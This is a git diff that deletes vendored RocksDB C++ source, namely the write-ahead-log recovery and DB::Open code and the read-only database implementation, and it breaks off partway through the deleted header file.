-  Status status;
-  std::unordered_map<int, VersionEdit> version_edits;
-  // no need to refcount because iteration is under mutex
-  for (auto cfd : *versions_->GetColumnFamilySet()) {
-    VersionEdit edit;
-    edit.SetColumnFamily(cfd->GetID());
-    version_edits.insert({cfd->GetID(), edit});
-  }
-  int job_id = next_job_id_.fetch_add(1);
-  {
-    auto stream = event_logger_.Log();
-    stream << "job" << job_id << "event"
-           << "recovery_started";
-    stream << "log_files";
-    stream.StartArray();
-    for (auto log_number : log_numbers) {
-      stream << log_number;
-    }
-    stream.EndArray();
-  }
-
-#ifndef ROCKSDB_LITE
-  if (immutable_db_options_.wal_filter != nullptr) {
-    std::map<std::string, uint32_t> cf_name_id_map;
-    std::map<uint32_t, uint64_t> cf_lognumber_map;
-    for (auto cfd : *versions_->GetColumnFamilySet()) {
-      cf_name_id_map.insert(
-        std::make_pair(cfd->GetName(), cfd->GetID()));
-      cf_lognumber_map.insert(
-        std::make_pair(cfd->GetID(), cfd->GetLogNumber()));
-    }
-
-    immutable_db_options_.wal_filter->ColumnFamilyLogNumberMap(cf_lognumber_map,
-                                                               cf_name_id_map);
-  }
-#endif
-
-  bool stop_replay_by_wal_filter = false;
-  bool stop_replay_for_corruption = false;
-  bool flushed = false;
-  for (auto log_number : log_numbers) {
-    // The previous incarnation may not have written any MANIFEST
-    // records after allocating this log number.  So we manually
-    // update the file number allocation counter in VersionSet.
-    versions_->MarkFileNumberUsedDuringRecovery(log_number);
-    // Open the log file
-    std::string fname = LogFileName(immutable_db_options_.wal_dir, log_number);
-
-    ROCKS_LOG_INFO(immutable_db_options_.info_log,
-                   "Recovering log #%" PRIu64 " mode %d", log_number,
-                   immutable_db_options_.wal_recovery_mode);
-    auto logFileDropped = [this, &fname]() {
-      uint64_t bytes;
-      if (env_->GetFileSize(fname, &bytes).ok()) {
-        auto info_log = immutable_db_options_.info_log.get();
-        ROCKS_LOG_WARN(info_log, "%s: dropping %d bytes", fname.c_str(),
-                       static_cast<int>(bytes));
-      }
-    };
-    if (stop_replay_by_wal_filter) {
-      logFileDropped();
-      continue;
-    }
-
-    unique_ptr<SequentialFileReader> file_reader;
-    {
-      unique_ptr<SequentialFile> file;
-      status = env_->NewSequentialFile(fname, &file,
-                                       env_->OptimizeForLogRead(env_options_));
-      if (!status.ok()) {
-        MaybeIgnoreError(&status);
-        if (!status.ok()) {
-          return status;
-        } else {
-          // Fail with one log file, but that's ok.
-          // Try next one.
-          continue;
-        }
-      }
-      file_reader.reset(new SequentialFileReader(std::move(file)));
-    }
-
-    // Create the log reader.
-    LogReporter reporter;
-    reporter.env = env_;
-    reporter.info_log = immutable_db_options_.info_log.get();
-    reporter.fname = fname.c_str();
-    if (!immutable_db_options_.paranoid_checks ||
-        immutable_db_options_.wal_recovery_mode ==
-            WALRecoveryMode::kSkipAnyCorruptedRecords) {
-      reporter.status = nullptr;
-    } else {
-      reporter.status = &status;
-    }
-    // We intentially make log::Reader do checksumming even if
-    // paranoid_checks==false so that corruptions cause entire commits
-    // to be skipped instead of propagating bad information (like overly
-    // large sequence numbers).
-    log::Reader reader(immutable_db_options_.info_log, std::move(file_reader),
-                       &reporter, true /*checksum*/, 0 /*initial_offset*/,
-                       log_number);
-
-    // Determine if we should tolerate incomplete records at the tail end of the
-    // Read all the records and add to a memtable
-    std::string scratch;
-    Slice record;
-    WriteBatch batch;
-
-    while (!stop_replay_by_wal_filter &&
-           reader.ReadRecord(&record, &scratch,
-                             immutable_db_options_.wal_recovery_mode) &&
-           status.ok()) {
-      if (record.size() < WriteBatchInternal::kHeader) {
-        reporter.Corruption(record.size(),
-                            Status::Corruption("log record too small"));
-        continue;
-      }
-      WriteBatchInternal::SetContents(&batch, record);
-      SequenceNumber sequence = WriteBatchInternal::Sequence(&batch);
-
-      if (immutable_db_options_.wal_recovery_mode ==
-          WALRecoveryMode::kPointInTimeRecovery) {
-        // In point-in-time recovery mode, if sequence id of log files are
-        // consecutive, we continue recovery despite corruption. This could
-        // happen when we open and write to a corrupted DB, where sequence id
-        // will start from the last sequence id we recovered.
-        if (sequence == *next_sequence) {
-          stop_replay_for_corruption = false;
-        }
-        if (stop_replay_for_corruption) {
-          logFileDropped();
-          break;
-        }
-      }
-
-#ifndef ROCKSDB_LITE
-      if (immutable_db_options_.wal_filter != nullptr) {
-        WriteBatch new_batch;
-        bool batch_changed = false;
-
-        WalFilter::WalProcessingOption wal_processing_option =
-            immutable_db_options_.wal_filter->LogRecordFound(
-                log_number, fname, batch, &new_batch, &batch_changed);
-
-        switch (wal_processing_option) {
-          case WalFilter::WalProcessingOption::kContinueProcessing:
-            // do nothing, proceeed normally
-            break;
-          case WalFilter::WalProcessingOption::kIgnoreCurrentRecord:
-            // skip current record
-            continue;
-          case WalFilter::WalProcessingOption::kStopReplay:
-            // skip current record and stop replay
-            stop_replay_by_wal_filter = true;
-            continue;
-          case WalFilter::WalProcessingOption::kCorruptedRecord: {
-            status =
-                Status::Corruption("Corruption reported by Wal Filter ",
-                                   immutable_db_options_.wal_filter->Name());
-            MaybeIgnoreError(&status);
-            if (!status.ok()) {
-              reporter.Corruption(record.size(), status);
-              continue;
-            }
-            break;
-          }
-          default: {
-            assert(false);  // unhandled case
-            status = Status::NotSupported(
-                "Unknown WalProcessingOption returned"
-                " by Wal Filter ",
-                immutable_db_options_.wal_filter->Name());
-            MaybeIgnoreError(&status);
-            if (!status.ok()) {
-              return status;
-            } else {
-              // Ignore the error with current record processing.
-              continue;
-            }
-          }
-        }
-
-        if (batch_changed) {
-          // Make sure that the count in the new batch is
-          // within the orignal count.
-          int new_count = WriteBatchInternal::Count(&new_batch);
-          int original_count = WriteBatchInternal::Count(&batch);
-          if (new_count > original_count) {
-            ROCKS_LOG_FATAL(
-                immutable_db_options_.info_log,
-                "Recovering log #%" PRIu64
-                " mode %d log filter %s returned "
-                "more records (%d) than original (%d) which is not allowed. "
-                "Aborting recovery.",
-                log_number, immutable_db_options_.wal_recovery_mode,
-                immutable_db_options_.wal_filter->Name(), new_count,
-                original_count);
-            status = Status::NotSupported(
-                "More than original # of records "
-                "returned by Wal Filter ",
-                immutable_db_options_.wal_filter->Name());
-            return status;
-          }
-          // Set the same sequence number in the new_batch
-          // as the original batch.
-          WriteBatchInternal::SetSequence(&new_batch,
-                                          WriteBatchInternal::Sequence(&batch));
-          batch = new_batch;
-        }
-      }
-#endif  // ROCKSDB_LITE
-
-      // If column family was not found, it might mean that the WAL write
-      // batch references to the column family that was dropped after the
-      // insert. We don't want to fail the whole write batch in that case --
-      // we just ignore the update.
-      // That's why we set ignore missing column families to true
-      bool has_valid_writes = false;
-      status = WriteBatchInternal::InsertInto(
-          &batch, column_family_memtables_.get(), &flush_scheduler_, true,
-          log_number, this, false /* concurrent_memtable_writes */,
-          next_sequence, &has_valid_writes);
-      MaybeIgnoreError(&status);
-      if (!status.ok()) {
-        // We are treating this as a failure while reading since we read valid
-        // blocks that do not form coherent data
-        reporter.Corruption(record.size(), status);
-        continue;
-      }
-
-      if (has_valid_writes && !read_only) {
-        // we can do this because this is called before client has access to the
-        // DB and there is only a single thread operating on DB
-        ColumnFamilyData* cfd;
-
-        while ((cfd = flush_scheduler_.TakeNextColumnFamily()) != nullptr) {
-          cfd->Unref();
-          // If this asserts, it means that InsertInto failed in
-          // filtering updates to already-flushed column families
-          assert(cfd->GetLogNumber() <= log_number);
-          auto iter = version_edits.find(cfd->GetID());
-          assert(iter != version_edits.end());
-          VersionEdit* edit = &iter->second;
-          status = WriteLevel0TableForRecovery(job_id, cfd, cfd->mem(), edit);
-          if (!status.ok()) {
-            // Reflect errors immediately so that conditions like full
-            // file-systems cause the DB::Open() to fail.
-            return status;
-          }
-          flushed = true;
-
-          cfd->CreateNewMemtable(*cfd->GetLatestMutableCFOptions(),
-                                 *next_sequence);
-        }
-      }
-    }
-
-    if (!status.ok()) {
-      if (immutable_db_options_.wal_recovery_mode ==
-          WALRecoveryMode::kSkipAnyCorruptedRecords) {
-        // We should ignore all errors unconditionally
-        status = Status::OK();
-      } else if (immutable_db_options_.wal_recovery_mode ==
-                 WALRecoveryMode::kPointInTimeRecovery) {
-        // We should ignore the error but not continue replaying
-        status = Status::OK();
-        stop_replay_for_corruption = true;
-        ROCKS_LOG_INFO(immutable_db_options_.info_log,
-                       "Point in time recovered to log #%" PRIu64
-                       " seq #%" PRIu64,
-                       log_number, *next_sequence);
-      } else {
-        assert(immutable_db_options_.wal_recovery_mode ==
-                   WALRecoveryMode::kTolerateCorruptedTailRecords ||
-               immutable_db_options_.wal_recovery_mode ==
-                   WALRecoveryMode::kAbsoluteConsistency);
-        return status;
-      }
-    }
-
-    flush_scheduler_.Clear();
-    auto last_sequence = *next_sequence - 1;
-    if ((*next_sequence != kMaxSequenceNumber) &&
-        (versions_->LastSequence() <= last_sequence)) {
-      versions_->SetLastToBeWrittenSequence(last_sequence);
-      versions_->SetLastSequence(last_sequence);
-    }
-  }
-
-  // True if there's any data in the WALs; if not, we can skip re-processing
-  // them later
-  bool data_seen = false;
-  if (!read_only) {
-    // no need to refcount since client still doesn't have access
-    // to the DB and can not drop column families while we iterate
-    auto max_log_number = log_numbers.back();
-    for (auto cfd : *versions_->GetColumnFamilySet()) {
-      auto iter = version_edits.find(cfd->GetID());
-      assert(iter != version_edits.end());
-      VersionEdit* edit = &iter->second;
-
-      if (cfd->GetLogNumber() > max_log_number) {
-        // Column family cfd has already flushed the data
-        // from all logs. Memtable has to be empty because
-        // we filter the updates based on log_number
-        // (in WriteBatch::InsertInto)
-        assert(cfd->mem()->GetFirstSequenceNumber() == 0);
-        assert(edit->NumEntries() == 0);
-        continue;
-      }
-
-      // flush the final memtable (if non-empty)
-      if (cfd->mem()->GetFirstSequenceNumber() != 0) {
-        // If flush happened in the middle of recovery (e.g. due to memtable
-        // being full), we flush at the end. Otherwise we'll need to record
-        // where we were on last flush, which make the logic complicated.
-        if (flushed || !immutable_db_options_.avoid_flush_during_recovery) {
-          status = WriteLevel0TableForRecovery(job_id, cfd, cfd->mem(), edit);
-          if (!status.ok()) {
-            // Recovery failed
-            break;
-          }
-          flushed = true;
-
-          cfd->CreateNewMemtable(*cfd->GetLatestMutableCFOptions(),
-                                 versions_->LastSequence());
-        }
-        data_seen = true;
-      }
-
-      // write MANIFEST with update
-      // writing log_number in the manifest means that any log file
-      // with number strongly less than (log_number + 1) is already
-      // recovered and should be ignored on next reincarnation.
-      // Since we already recovered max_log_number, we want all logs
-      // with numbers `<= max_log_number` (includes this one) to be ignored
-      if (flushed || cfd->mem()->GetFirstSequenceNumber() == 0) {
-        edit->SetLogNumber(max_log_number + 1);
-      }
-      // we must mark the next log number as used, even though it's
-      // not actually used. that is because VersionSet assumes
-      // VersionSet::next_file_number_ always to be strictly greater than any
-      // log number
-      versions_->MarkFileNumberUsedDuringRecovery(max_log_number + 1);
-      status = versions_->LogAndApply(
-          cfd, *cfd->GetLatestMutableCFOptions(), edit, &mutex_);
-      if (!status.ok()) {
-        // Recovery failed
-        break;
-      }
-    }
-  }
-
-  if (data_seen && !flushed) {
-    // Mark these as alive so they'll be considered for deletion later by
-    // FindObsoleteFiles()
-    if (concurrent_prepare_) {
-      log_write_mutex_.Lock();
-    }
-    for (auto log_number : log_numbers) {
-      alive_log_files_.push_back(LogFileNumberSize(log_number));
-    }
-    if (concurrent_prepare_) {
-      log_write_mutex_.Unlock();
-    }
-  }
-
-  event_logger_.Log() << "job" << job_id << "event"
-                      << "recovery_finished";
-
-  return status;
-}
-
-Status DBImpl::WriteLevel0TableForRecovery(int job_id, ColumnFamilyData* cfd,
-                                           MemTable* mem, VersionEdit* edit) {
-  mutex_.AssertHeld();
-  const uint64_t start_micros = env_->NowMicros();
-  FileMetaData meta;
-  auto pending_outputs_inserted_elem =
-      CaptureCurrentFileNumberInPendingOutputs();
-  meta.fd = FileDescriptor(versions_->NewFileNumber(), 0, 0);
-  ReadOptions ro;
-  ro.total_order_seek = true;
-  Arena arena;
-  Status s;
-  TableProperties table_properties;
-  {
-    ScopedArenaIterator iter(mem->NewIterator(ro, &arena));
-    ROCKS_LOG_DEBUG(immutable_db_options_.info_log,
-                    "[%s] [WriteLevel0TableForRecovery]"
-                    " Level-0 table #%" PRIu64 ": started",
-                    cfd->GetName().c_str(), meta.fd.GetNumber());
-
-    // Get the latest mutable cf options while the mutex is still locked
-    const MutableCFOptions mutable_cf_options =
-        *cfd->GetLatestMutableCFOptions();
-    bool paranoid_file_checks =
-        cfd->GetLatestMutableCFOptions()->paranoid_file_checks;
-
-    int64_t _current_time = 0;
-    env_->GetCurrentTime(&_current_time);  // ignore error
-    const uint64_t current_time = static_cast<uint64_t>(_current_time);
-
-    {
-      mutex_.Unlock();
-
-      SequenceNumber earliest_write_conflict_snapshot;
-      std::vector<SequenceNumber> snapshot_seqs =
-          snapshots_.GetAll(&earliest_write_conflict_snapshot);
-
-      EnvOptions optimized_env_options =
-          env_->OptimizeForCompactionTableWrite(env_options_, immutable_db_options_);
-      s = BuildTable(
-          dbname_, env_, *cfd->ioptions(), mutable_cf_options,
-          optimized_env_options, cfd->table_cache(), iter.get(),
-          std::unique_ptr<InternalIterator>(mem->NewRangeTombstoneIterator(ro)),
-          &meta, cfd->internal_comparator(),
-          cfd->int_tbl_prop_collector_factories(), cfd->GetID(), cfd->GetName(),
-          snapshot_seqs, earliest_write_conflict_snapshot,
-          GetCompressionFlush(*cfd->ioptions(), mutable_cf_options),
-          cfd->ioptions()->compression_opts, paranoid_file_checks,
-          cfd->internal_stats(), TableFileCreationReason::kRecovery,
-          &event_logger_, job_id, Env::IO_HIGH, nullptr /* table_properties */,
-          -1 /* level */, current_time);
-      LogFlush(immutable_db_options_.info_log);
-      ROCKS_LOG_DEBUG(immutable_db_options_.info_log,
-                      "[%s] [WriteLevel0TableForRecovery]"
-                      " Level-0 table #%" PRIu64 ": %" PRIu64 " bytes %s",
-                      cfd->GetName().c_str(), meta.fd.GetNumber(),
-                      meta.fd.GetFileSize(), s.ToString().c_str());
-      mutex_.Lock();
-    }
-  }
-  ReleaseFileNumberFromPendingOutputs(pending_outputs_inserted_elem);
-
-  // Note that if file_size is zero, the file has been deleted and
-  // should not be added to the manifest.
-  int level = 0;
-  if (s.ok() && meta.fd.GetFileSize() > 0) {
-    edit->AddFile(level, meta.fd.GetNumber(), meta.fd.GetPathId(),
-                  meta.fd.GetFileSize(), meta.smallest, meta.largest,
-                  meta.smallest_seqno, meta.largest_seqno,
-                  meta.marked_for_compaction);
-  }
-
-  InternalStats::CompactionStats stats(1);
-  stats.micros = env_->NowMicros() - start_micros;
-  stats.bytes_written = meta.fd.GetFileSize();
-  stats.num_output_files = 1;
-  cfd->internal_stats()->AddCompactionStats(level, stats);
-  cfd->internal_stats()->AddCFStats(
-      InternalStats::BYTES_FLUSHED, meta.fd.GetFileSize());
-  RecordTick(stats_, COMPACT_WRITE_BYTES, meta.fd.GetFileSize());
-  return s;
-}
-
-Status DB::Open(const Options& options, const std::string& dbname, DB** dbptr) {
-  DBOptions db_options(options);
-  ColumnFamilyOptions cf_options(options);
-  std::vector<ColumnFamilyDescriptor> column_families;
-  column_families.push_back(
-      ColumnFamilyDescriptor(kDefaultColumnFamilyName, cf_options));
-  std::vector<ColumnFamilyHandle*> handles;
-  Status s = DB::Open(db_options, dbname, column_families, &handles, dbptr);
-  if (s.ok()) {
-    assert(handles.size() == 1);
-    // i can delete the handle since DBImpl is always holding a reference to
-    // default column family
-    delete handles[0];
-  }
-  return s;
-}
-
-Status DB::Open(const DBOptions& db_options, const std::string& dbname,
-                const std::vector<ColumnFamilyDescriptor>& column_families,
-                std::vector<ColumnFamilyHandle*>* handles, DB** dbptr) {
-  Status s = SanitizeOptionsByTable(db_options, column_families);
-  if (!s.ok()) {
-    return s;
-  }
-
-  s = ValidateOptions(db_options, column_families);
-  if (!s.ok()) {
-    return s;
-  }
-
-  *dbptr = nullptr;
-  handles->clear();
-
-  size_t max_write_buffer_size = 0;
-  for (auto cf : column_families) {
-    max_write_buffer_size =
-        std::max(max_write_buffer_size, cf.options.write_buffer_size);
-  }
-
-  DBImpl* impl = new DBImpl(db_options, dbname);
-  s = impl->env_->CreateDirIfMissing(impl->immutable_db_options_.wal_dir);
-  if (s.ok()) {
-    for (auto db_path : impl->immutable_db_options_.db_paths) {
-      s = impl->env_->CreateDirIfMissing(db_path.path);
-      if (!s.ok()) {
-        break;
-      }
-    }
-  }
-
-  if (!s.ok()) {
-    delete impl;
-    return s;
-  }
-
-  s = impl->CreateArchivalDirectory();
-  if (!s.ok()) {
-    delete impl;
-    return s;
-  }
-  impl->mutex_.Lock();
-  // Handles create_if_missing, error_if_exists
-  s = impl->Recover(column_families);
-  if (s.ok()) {
-    uint64_t new_log_number = impl->versions_->NewFileNumber();
-    unique_ptr<WritableFile> lfile;
-    EnvOptions soptions(db_options);
-    EnvOptions opt_env_options =
-        impl->immutable_db_options_.env->OptimizeForLogWrite(
-            soptions, BuildDBOptions(impl->immutable_db_options_,
-                                     impl->mutable_db_options_));
-    s = NewWritableFile(
-        impl->immutable_db_options_.env,
-        LogFileName(impl->immutable_db_options_.wal_dir, new_log_number),
-        &lfile, opt_env_options);
-    if (s.ok()) {
-      lfile->SetPreallocationBlockSize(
-          impl->GetWalPreallocateBlockSize(max_write_buffer_size));
-      {
-        InstrumentedMutexLock wl(&impl->log_write_mutex_);
-        impl->logfile_number_ = new_log_number;
-        unique_ptr<WritableFileWriter> file_writer(
-            new WritableFileWriter(std::move(lfile), opt_env_options));
-        impl->logs_.emplace_back(
-            new_log_number,
-            new log::Writer(
-                std::move(file_writer), new_log_number,
-                impl->immutable_db_options_.recycle_log_file_num > 0));
-      }
-
-      // set column family handles
-      for (auto cf : column_families) {
-        auto cfd =
-            impl->versions_->GetColumnFamilySet()->GetColumnFamily(cf.name);
-        if (cfd != nullptr) {
-          handles->push_back(
-              new ColumnFamilyHandleImpl(cfd, impl, &impl->mutex_));
-          impl->NewThreadStatusCfInfo(cfd);
-        } else {
-          if (db_options.create_missing_column_families) {
-            // missing column family, create it
-            ColumnFamilyHandle* handle;
-            impl->mutex_.Unlock();
-            s = impl->CreateColumnFamily(cf.options, cf.name, &handle);
-            impl->mutex_.Lock();
-            if (s.ok()) {
-              handles->push_back(handle);
-            } else {
-              break;
-            }
-          } else {
-            s = Status::InvalidArgument("Column family not found: ", cf.name);
-            break;
-          }
-        }
-      }
-    }
-    if (s.ok()) {
-      for (auto cfd : *impl->versions_->GetColumnFamilySet()) {
-        delete impl->InstallSuperVersionAndScheduleWork(
-            cfd, nullptr, *cfd->GetLatestMutableCFOptions());
-      }
-      if (impl->concurrent_prepare_) {
-        impl->log_write_mutex_.Lock();
-      }
-      impl->alive_log_files_.push_back(
-          DBImpl::LogFileNumberSize(impl->logfile_number_));
-      if (impl->concurrent_prepare_) {
-        impl->log_write_mutex_.Unlock();
-      }
-      impl->DeleteObsoleteFiles();
-      s = impl->directories_.GetDbDir()->Fsync();
-    }
-  }
-
-  if (s.ok()) {
-    for (auto cfd : *impl->versions_->GetColumnFamilySet()) {
-      if (cfd->ioptions()->compaction_style == kCompactionStyleFIFO) {
-        auto* vstorage = cfd->current()->storage_info();
-        for (int i = 1; i < vstorage->num_levels(); ++i) {
-          int num_files = vstorage->NumLevelFiles(i);
-          if (num_files > 0) {
-            s = Status::InvalidArgument(
-                "Not all files are at level 0. Cannot "
-                "open with FIFO compaction style.");
-            break;
-          }
-        }
-      }
-      if (!cfd->mem()->IsSnapshotSupported()) {
-        impl->is_snapshot_supported_ = false;
-      }
-      if (cfd->ioptions()->merge_operator != nullptr &&
-          !cfd->mem()->IsMergeOperatorSupported()) {
-        s = Status::InvalidArgument(
-            "The memtable of column family %s does not support merge operator "
-            "its options.merge_operator is non-null", cfd->GetName().c_str());
-      }
-      if (!s.ok()) {
-        break;
-      }
-    }
-  }
-  TEST_SYNC_POINT("DBImpl::Open:Opened");
-  Status persist_options_status;
-  if (s.ok()) {
-    // Persist RocksDB Options before scheduling the compaction.
-    // The WriteOptionsFile() will release and lock the mutex internally.
-    persist_options_status = impl->WriteOptionsFile(
-        false /*need_mutex_lock*/, false /*need_enter_write_thread*/);
-
-    *dbptr = impl;
-    impl->opened_successfully_ = true;
-    impl->MaybeScheduleFlushOrCompaction();
-  }
-  impl->mutex_.Unlock();
-
-#ifndef ROCKSDB_LITE
-  auto sfm = static_cast<SstFileManagerImpl*>(
-      impl->immutable_db_options_.sst_file_manager.get());
-  if (s.ok() && sfm) {
-    // Notify SstFileManager about all sst files that already exist in
-    // db_paths[0] when the DB is opened.
-    auto& db_path = impl->immutable_db_options_.db_paths[0];
-    std::vector<std::string> existing_files;
-    impl->immutable_db_options_.env->GetChildren(db_path.path, &existing_files);
-    for (auto& file_name : existing_files) {
-      uint64_t file_number;
-      FileType file_type;
-      std::string file_path = db_path.path + "/" + file_name;
-      if (ParseFileName(file_name, &file_number, &file_type) &&
-          file_type == kTableFile) {
-        sfm->OnAddFile(file_path);
-      }
-    }
-  }
-#endif  // !ROCKSDB_LITE
-
-  if (s.ok()) {
-    ROCKS_LOG_INFO(impl->immutable_db_options_.info_log, "DB pointer %p", impl);
-    LogFlush(impl->immutable_db_options_.info_log);
-    if (!persist_options_status.ok()) {
-      s = Status::IOError(
-          "DB::Open() failed --- Unable to persist Options file",
-          persist_options_status.ToString());
-    }
-  }
-  if (!s.ok()) {
-    for (auto* h : *handles) {
-      delete h;
-    }
-    handles->clear();
-    delete impl;
-    *dbptr = nullptr;
-  }
-  return s;
-}
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/db_impl_readonly.cc b/thirdparty/rocksdb/db/db_impl_readonly.cc
deleted file mode 100644
index d69eecb..0000000
--- a/thirdparty/rocksdb/db/db_impl_readonly.cc
+++ /dev/null
@@ -1,197 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include "db/db_impl_readonly.h"
-
-#include "db/compacted_db_impl.h"
-#include "db/db_impl.h"
-#include "db/db_iter.h"
-#include "db/merge_context.h"
-#include "db/range_del_aggregator.h"
-#include "monitoring/perf_context_imp.h"
-
-namespace rocksdb {
-
-#ifndef ROCKSDB_LITE
-
-DBImplReadOnly::DBImplReadOnly(const DBOptions& db_options,
-                               const std::string& dbname)
-    : DBImpl(db_options, dbname) {
-  ROCKS_LOG_INFO(immutable_db_options_.info_log,
-                 "Opening the db in read only mode");
-  LogFlush(immutable_db_options_.info_log);
-}
-
-DBImplReadOnly::~DBImplReadOnly() {
-}
-
-// Implementations of the DB interface
-Status DBImplReadOnly::Get(const ReadOptions& read_options,
-                           ColumnFamilyHandle* column_family, const Slice& key,
-                           PinnableSlice* pinnable_val) {
-  assert(pinnable_val != nullptr);
-  Status s;
-  SequenceNumber snapshot = versions_->LastSequence();
-  auto cfh = reinterpret_cast<ColumnFamilyHandleImpl*>(column_family);
-  auto cfd = cfh->cfd();
-  SuperVersion* super_version = cfd->GetSuperVersion();
-  MergeContext merge_context;
-  RangeDelAggregator range_del_agg(cfd->internal_comparator(), snapshot);
-  LookupKey lkey(key, snapshot);
-  if (super_version->mem->Get(lkey, pinnable_val->GetSelf(), &s, &merge_context,
-                              &range_del_agg, read_options)) {
-    pinnable_val->PinSelf();
-  } else {
-    PERF_TIMER_GUARD(get_from_output_files_time);
-    super_version->current->Get(read_options, lkey, pinnable_val, &s,
-                                &merge_context, &range_del_agg);
-  }
-  return s;
-}
-
-Iterator* DBImplReadOnly::NewIterator(const ReadOptions& read_options,
-                                      ColumnFamilyHandle* column_family) {
-  auto cfh = reinterpret_cast<ColumnFamilyHandleImpl*>(column_family);
-  auto cfd = cfh->cfd();
-  SuperVersion* super_version = cfd->GetSuperVersion()->Ref();
-  SequenceNumber latest_snapshot = versions_->LastSequence();
-  auto db_iter = NewArenaWrappedDbIterator(
-      env_, read_options, *cfd->ioptions(),
-      (read_options.snapshot != nullptr
-           ? reinterpret_cast<const SnapshotImpl*>(read_options.snapshot)
-                 ->number_
-           : latest_snapshot),
-      super_version->mutable_cf_options.max_sequential_skip_in_iterations,
-      super_version->version_number);
-  auto internal_iter =
-      NewInternalIterator(read_options, cfd, super_version, db_iter->GetArena(),
-                          db_iter->GetRangeDelAggregator());
-  db_iter->SetIterUnderDBIter(internal_iter);
-  return db_iter;
-}
-
-Status DBImplReadOnly::NewIterators(
-    const ReadOptions& read_options,
-    const std::vector<ColumnFamilyHandle*>& column_families,
-    std::vector<Iterator*>* iterators) {
-  if (iterators == nullptr) {
-    return Status::InvalidArgument("iterators not allowed to be nullptr");
-  }
-  iterators->clear();
-  iterators->reserve(column_families.size());
-  SequenceNumber latest_snapshot = versions_->LastSequence();
-
-  for (auto cfh : column_families) {
-    auto* cfd = reinterpret_cast<ColumnFamilyHandleImpl*>(cfh)->cfd();
-    auto* sv = cfd->GetSuperVersion()->Ref();
-    auto* db_iter = NewArenaWrappedDbIterator(
-        env_, read_options, *cfd->ioptions(),
-        (read_options.snapshot != nullptr
-             ? reinterpret_cast<const SnapshotImpl*>(read_options.snapshot)
-                   ->number_
-             : latest_snapshot),
-        sv->mutable_cf_options.max_sequential_skip_in_iterations,
-        sv->version_number);
-    auto* internal_iter =
-        NewInternalIterator(read_options, cfd, sv, db_iter->GetArena(),
-                            db_iter->GetRangeDelAggregator());
-    db_iter->SetIterUnderDBIter(internal_iter);
-    iterators->push_back(db_iter);
-  }
-
-  return Status::OK();
-}
-
-Status DB::OpenForReadOnly(const Options& options, const std::string& dbname,
-                           DB** dbptr, bool error_if_log_file_exist) {
-  *dbptr = nullptr;
-
-  // Try to first open DB as fully compacted DB
-  Status s;
-  s = CompactedDBImpl::Open(options, dbname, dbptr);
-  if (s.ok()) {
-    return s;
-  }
-
-  DBOptions db_options(options);
-  ColumnFamilyOptions cf_options(options);
-  std::vector<ColumnFamilyDescriptor> column_families;
-  column_families.push_back(
-      ColumnFamilyDescriptor(kDefaultColumnFamilyName, cf_options));
-  std::vector<ColumnFamilyHandle*> handles;
-
-  s = DB::OpenForReadOnly(db_options, dbname, column_families, &handles, dbptr);
-  if (s.ok()) {
-    assert(handles.size() == 1);
-    // i can delete the handle since DBImpl is always holding a
-    // reference to default column family
-    delete handles[0];
-  }
-  return s;
-}
-
-Status DB::OpenForReadOnly(
-    const DBOptions& db_options, const std::string& dbname,
-    const std::vector<ColumnFamilyDescriptor>& column_families,
-    std::vector<ColumnFamilyHandle*>* handles, DB** dbptr,
-    bool error_if_log_file_exist) {
-  *dbptr = nullptr;
-  handles->clear();
-
-  DBImplReadOnly* impl = new DBImplReadOnly(db_options, dbname);
-  impl->mutex_.Lock();
-  Status s = impl->Recover(column_families, true /* read only */,
-                           error_if_log_file_exist);
-  if (s.ok()) {
-    // set column family handles
-    for (auto cf : column_families) {
-      auto cfd =
-          impl->versions_->GetColumnFamilySet()->GetColumnFamily(cf.name);
-      if (cfd == nullptr) {
-        s = Status::InvalidArgument("Column family not found: ", cf.name);
-        break;
-      }
-      handles->push_back(new ColumnFamilyHandleImpl(cfd, impl, &impl->mutex_));
-    }
-  }
-  if (s.ok()) {
-    for (auto cfd : *impl->versions_->GetColumnFamilySet()) {
-      delete cfd->InstallSuperVersion(new SuperVersion(), &impl->mutex_);
-    }
-  }
-  impl->mutex_.Unlock();
-  if (s.ok()) {
-    *dbptr = impl;
-    for (auto* h : *handles) {
-      impl->NewThreadStatusCfInfo(
-          reinterpret_cast<ColumnFamilyHandleImpl*>(h)->cfd());
-    }
-  } else {
-    for (auto h : *handles) {
-      delete h;
-    }
-    handles->clear();
-    delete impl;
-  }
-  return s;
-}
-
-#else  // !ROCKSDB_LITE
-
-Status DB::OpenForReadOnly(const Options& options, const std::string& dbname,
-                           DB** dbptr, bool error_if_log_file_exist) {
-  return Status::NotSupported("Not supported in ROCKSDB_LITE.");
-}
-
-Status DB::OpenForReadOnly(
-    const DBOptions& db_options, const std::string& dbname,
-    const std::vector<ColumnFamilyDescriptor>& column_families,
-    std::vector<ColumnFamilyHandle*>* handles, DB** dbptr,
-    bool error_if_log_file_exist) {
-  return Status::NotSupported("Not supported in ROCKSDB_LITE.");
-}
-#endif  // !ROCKSDB_LITE
-
-}   // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/db_impl_readonly.h b/thirdparty/rocksdb/db/db_impl_readonly.h
deleted file mode 100644
index 9bdc95c..0000000
--- a/thirdparty/rocksdb/db/db_impl_readonly.h
+++ /dev/null
@@ -1,123 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-
-#ifndef ROCKSDB_LITE
-
-#include "db/db_impl.h"
-#include <vector>
-#include <string>
-
-namespace rocksdb {
-
-class DBImplReadOnly : public DBImpl {
- public:
-  DBImplReadOnly(const DBOptions& options, const std::string& dbname);
-  virtual ~DBImplReadOnly();
-
-  // Implementations of the DB interface
-  using DB::Get;
-  virtual Status Get(const ReadOptions& options,
-                     ColumnFamilyHandle* column_family, const Slice& key,
-                     PinnableSlice* value) override;
-
-  // TODO: Implement ReadOnly MultiGet?
-
-  using DBImpl::NewIterator;
-  virtual Iterator* NewIterator(const ReadOptions&,
-                                ColumnFamilyHandle* column_family) override;
-
-  virtual Status NewIterators(
-      const ReadOptions& options,
-      const std::vector<ColumnFamilyHandle*>& column_families,
-      std::vector<Iterator*>* iterators) override;
-
-  using DBImpl::Put;
-  virtual Status Put(const WriteOptions& options,
